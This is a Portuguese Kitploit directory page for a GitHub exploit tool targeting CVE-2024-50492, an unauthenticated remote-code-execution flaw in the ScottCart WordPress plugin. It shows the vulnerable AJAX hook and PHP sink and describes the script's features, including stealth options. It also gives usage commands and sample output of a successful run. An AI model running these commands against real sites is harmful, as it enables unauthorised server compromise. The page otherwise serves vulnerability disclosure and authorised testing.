Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-50492 — ScottCart <= 1.1 - Execução Remota de Código Não Autenticada | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2024-50492
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubnxploited/cve-2024-50492

CVE-2024-50492

ScottCart <= 1.1 - Execução Remota de Código Não Autenticada

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚨 CVE-2024-50492 - Exploit RCE ScottCart <= 1.1

🔥 Script de Exploit para ScottCart <= 1.1 - Execução Remota de Código Não Autenticada
🧑‍💻 Por Nxploit – Khaled Alenazi


📌 Descrição

O plugin ScottCart para WordPress (versões ≤ 1.1) é vulnerável a Execução Remota de Código (RCE).
Isso permite que atacantes não autenticados executem funções PHP arbitrárias no servidor por meio de um endpoint AJAX vulnerável.

  • Plugin: ScottCart ≤ 1.1
  • Vulnerabilidade: Injeção de Função Não Autenticada → RCE
  • CVE: CVE-2024-50492
  • Pontuação CVSS: 9.8 - Crítica

🧠 Como Funciona

O plugin registra uma ação AJAX desprotegida:

root@kitploit:~
add_action('wp_ajax_nopriv_scottcart_load_function', 'scottcart_load_function_callback');

Que executa:

root@kitploit:~
call_user_func($_POST['function']);

Permitindo que atacantes chamem qualquer função PHP existente, como:

phpinfo()
  • scottcart_get_the_user_ip()
  • system() ← se estendido em ambientes modificados

  • 🚀 Recursos do Exploit

    • ✅ Envia automaticamente payload elaborado para acionar o endpoint vulnerável
    • ✅ Permite substituir a função via argumento
    • ✅ Payload padrão: phpinfo() para PoC
    • ✅ Salva a saída em arquivo com data/hora (ex.: results_2025-03-26_14-33-01.txt)
    • ✅ User-Agent personalizado, tratamento de erros e ignorar SSL para furtividade

    🖥️ Uso

    root@kitploit:~
    usage: CVE-2024-50492.py [-h] -u URL [-p PAYLOAD]
    
    ScottCart <= 1.1 - Unauthenticated Remote Code Execution
    By Nxploit Khaled Alenazi.
    
    options:
      -h, --help            Show this help message and exit
      -u URL, --url URL     Target base URL (e.g., http://192.168.100.74:888/wordpress)
      -p PAYLOAD, --payload PAYLOAD
                            Function to call (default: phpinfo)
    

    💡 Exemplos

    🔍 Comportamento padrão (PoC com phpinfo()):

    root@kitploit:~
    python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress
    

    🔎 Chamar função interna do plugin:

    root@kitploit:~
    python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress -p scottcart_get_the_user_ip
    

    🧾 Exemplo de Saída

    root@kitploit:~
    [+] Target URL: http://192.168.100.74:888/wordpress
    [+] Payload Function: phpinfo
    [*] Launching exploit...
    [+] Sending payload: function=phpinfo
    [+] Exploit successful! Output:
    
    PHP Version => 8.1.12
    ...
    

    📁 E salvo em: results_2025-03-26_14-33-01.txt


    🛡️ Aviso Legal

    Esta ferramenta é apenas para fins de teste educacional e autorizado.
    Não use contra sistemas que você não possui ou sem permissão explícita para testar.


    💬 Créditos

    • 💻 Exploit por: Nxploit – Khaled Alenazi
    • 🛡️ ID do CVE: CVE-2024-50492
    Baixar ferramenta